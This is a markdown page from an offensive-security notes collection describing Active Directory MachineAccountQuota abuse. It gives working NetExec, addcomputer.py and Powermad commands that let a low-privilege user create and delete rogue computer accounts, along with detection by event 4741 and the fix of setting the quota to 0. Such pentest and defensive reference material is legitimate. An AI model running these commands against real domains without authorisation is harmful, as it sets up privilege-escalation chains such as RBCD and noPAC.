attack-47-machineaccountquota-maq-abuse.md (3322B)
1 --- 2 title: "Attack #47 β MachineAccountQuota (MAQ) Abuse" 3 description: "By default, any authenticated domain user can create up to 10 computer accounts (controlled by ms-DS-MachineAccountQuota). These attacker-created machineβ¦" 4 category: active-directory 5 subcategory: "Privilege & Group Abuse" 6 tags: ["active-directory"] 7 tools: ["NetExec", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Six/π£ Attack #47 β MachineAccountQuota (MAQ) Abuse.md" 11 --- 12 # π£ Attack #47 β MachineAccountQuota (MAQ) Abuse 13 14 *** 15 16 ## π How It Works 17 18 By default, any authenticated domain user can create up to **10 computer accounts** (controlled by `ms-DS-MachineAccountQuota`). These attacker-created machine accounts serve as building blocks for other attacks β most notably **RBCD (#17)**, **noPAC (#44)**, and **Certifried (#36)**. 19 20 *** 21 22 ## βοΈ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Domain user credentials** | Any authenticated user | 27 | **MAQ > 0** | Default = 10 | 28 29 *** 30 31 ## π» Full Commands 32 33 ```bash 34 # ββ Check MAQ value βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 35 nxc ldap DC01.corp.local -u low_user -p 'Password1' -M maq 36 # Output: MachineAccountQuota: 10 37 38 # ββ Create machine account ββββββββββββββββββββββββββββββββββββββββββββββββββββ 39 addcomputer.py -computer-name 'FAKE01$' -computer-pass 'FakePass!' \ 40 -dc-ip 10.10.10.10 corp.local/low_user:'Password1' 41 42 # ββ Delete machine account ββββββββββββββββββββββββββββββββββββββββββββββββββββ 43 addcomputer.py -computer-name 'FAKE01$' -computer-pass 'FakePass!' \ 44 -dc-ip 10.10.10.10 -delete corp.local/low_user:'Password1' 45 ``` 46 47 ```powershell 48 # ββ PowerShell / Powermad βββββββββββββββββββββββββββββββββββββββββββββββββββββ 49 Import-Module .\Powermad.ps1 50 New-MachineAccount -MachineAccount FAKE01 -Password ( 51 ConvertTo-SecureString 'FakePass!' -AsPlainText -Force 52 ) 53 54 # ββ Check MAQ βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 55 Get-ADObject -Identity "DC=corp,DC=local" -Properties ms-DS-MachineAccountQuota | 56 Select ms-DS-MachineAccountQuota 57 ``` 58 59 *** 60 61 ## π‘οΈ Detection β Event IDs 62 63 | Event ID | Source | What to Look For | 64 |---|---|---| 65 | **4741** | Security Log (DC) | Computer account created by non-admin user | 66 67 *** 68 69 ## π Attack Chain Context 70 71 ``` 72 [MAQ Abuse] βββ Create machine accounts for RBCD, noPAC, Certifried 73 β 74 ββββ π RBCD (#17): needs a controlled machine account 75 ββββ π noPAC (#44): rename machine account to DC name 76 ββββ π Certifried (#36): change DNS hostname to DC 77 ββββ π Defeated by: set MAQ to 0 78 ``` 79 80 *** 81 82 > β **Attack #47 β MAQ Abuse complete.**